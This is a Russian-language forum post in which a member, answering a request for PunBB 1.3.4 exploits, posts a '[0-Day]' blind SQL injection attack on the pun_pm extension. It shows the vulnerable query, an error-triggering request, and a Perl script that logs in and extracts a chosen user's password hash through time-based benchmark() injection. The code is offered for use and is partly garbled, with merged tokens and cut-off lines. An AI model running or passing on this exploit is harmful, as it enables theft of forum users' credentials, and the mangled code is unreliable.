|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
Сообщение от Welemir
На 1.3.4 LFi/RFI/inj ни у кого не завалялось,или уже не пентестят ?
есть блайнд
================================================== ===============
PunBB 526
# function pun_pm_edit_message()
# {
# global $forum_db, $forum_user, $lang_pun_pm;
#
# $errors = array();
#
# // Verify input data
# $query = array(
# 'SELECT' => 'm.id as id, m.sender_id as sender_id, m.status as status, u.username as username, m.subject as subject, m.body as body',
# 'FROM' => 'pun_pm_messages m',
# 'JOINS' => array(
# array(
# 'LEFT JO IN' => 'users AS u',
# 'ON' => '(u.id = m.receiver_id)'
# ),
# ),
# 'WHERE' => 'm.id = '.$forum_db->escape($_GET['message_id']).' AND m.sender_id = '.$forum_user['id'].' AND m.deleted_by_sender = 0'
# );
#
# ($hook = get_hook('pun_pm_fn_ed it_message_pre_validate_query')) ? eval($hook) : null;
#
# $result = $forum_db->query_build($query) or error(__FILE__, __LINE_ _);
# ----
# GET http://127.0.0.1/WaRWolFz/misc.php?section=pun_pm&pmpage=write&message_id=-1'
# Error - PunBB
# An error was encountered
# The error occurred on line 525 in ./WaRWolFz/extensions/pun_pm/functions.php
# Database reported: Errore di sintassi nell a query SQL vicino a '\ AND m.sender_id = 2 AND m.deleted_by_sender = 0' linea 1 (Er rno: 1064).
usestrict;
usewarnings;
useLWP::UserAgent;
useHTTP::Cookies;
useHTTP::Request::Common;
useTime::HiRes;
useIO::Socket;
my($UserName,$PassWord,$ID) = @ARGV;
if (@ARGVnew(GET=>$Host);
my $Cookies= newHTTP::Cookies;
my $HTTP= newLWP::UserAgent(
agent=>'Mozilla/5.0',
max_redirect=>0,
cookie_jar=>$Cookies,
) or die $!;
my $Referrer="http://www.warwolfz.org/";
my $DefaultTime=request($Referrer);
sub request{
$Referrer=$_[0];
$Method->referrer($Referrer);
$Start=Time::HiRes::time();
$Response=$HTTP->request($Method);
$Response->is_success() or die"$Host: ",$Response->message,"\n";
$End=Time::HiRes::time();
$Time=$End-$Start;
return$Time;
}
sub Blind_SQL_Jnjection{
my($dec,$hex) = @_;
return"./misc.php?section=pun_pm&pmpage=write&message_id=-1 OR 1!=(SELECT IF((ASCII(SUBSTRING(`password`,${dec},1))=${hex}),benchmark(200000000,CHAR(0)),0) FROM `users` WHERE `id`=${ID})--";
}
sub Clear() {
my $launch= $^O eq'MSWin32'?'cls':'clear';
returnsystem($launch);
}
sub Login() {
if ($ARGV[4] =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}?$/) {
$Cookies->proxy(['http','ftp'],'http://'.$ARGV[4]) or die $!;
}
my $Get=$HTTP->get($Host.'login.php');
my $csrf_token="";
if ($Get->content=~ /type="hidden"name="csrf_token"value="([a-f0-9]{1,40})/i) { #ByPassing csrf_token hidden input
$csrf_token= $1;
}
my$Login=$HTTP->post($Host.'login.php',
[
form_sent => '1',
redirect_u rl =>$Host.'login.php',
csrf_token =>$csrf_token,
req_userna me =>$UserName,
req_passwo rd =>$PassWord,
save_pass => '1',
login => 'Login',
]) || die $!;
if ($Login->content=~ /Verrai trasferito automaticamente ad una nuov a pagina in 1 secondo/i) { #English Language: You should automatic ally be forwarded to a new page in 1 seco nd.
return 1;
} else {
return 0;
}
}
sub usage {
Clear();
{
print "\n[0-Day]PunBB F
$Time_Start= time();
my$Get1=$HTTP->get($Host.Blind_SQL_Jnjection($I,$chars[$J]));
$Time_End= time();
$Time= request($Referrer);
refresh($Message,$Host,$DefaultTime,$J,$Hash,$Time,$I);
if ($Time_End-$Time_Start> 6) {
$Time= request($Referrer);
refresh($Message,$Host,$DefaultTime,$J,$Hash,$Time,$I);
if ($Time_End-$Time_Start> 6) {
syswrite(S TDOUT,chr($chars[$J]));
$Hash.= chr($chars[$J]);
$Time= request($Referrer);
refresh($Message,$Host,$DefaultTime,$J,$Hash,$Time,$I);
last;
}
}
}
if ($I== 1 && length$Hash[COLOR="#DD0000"]
|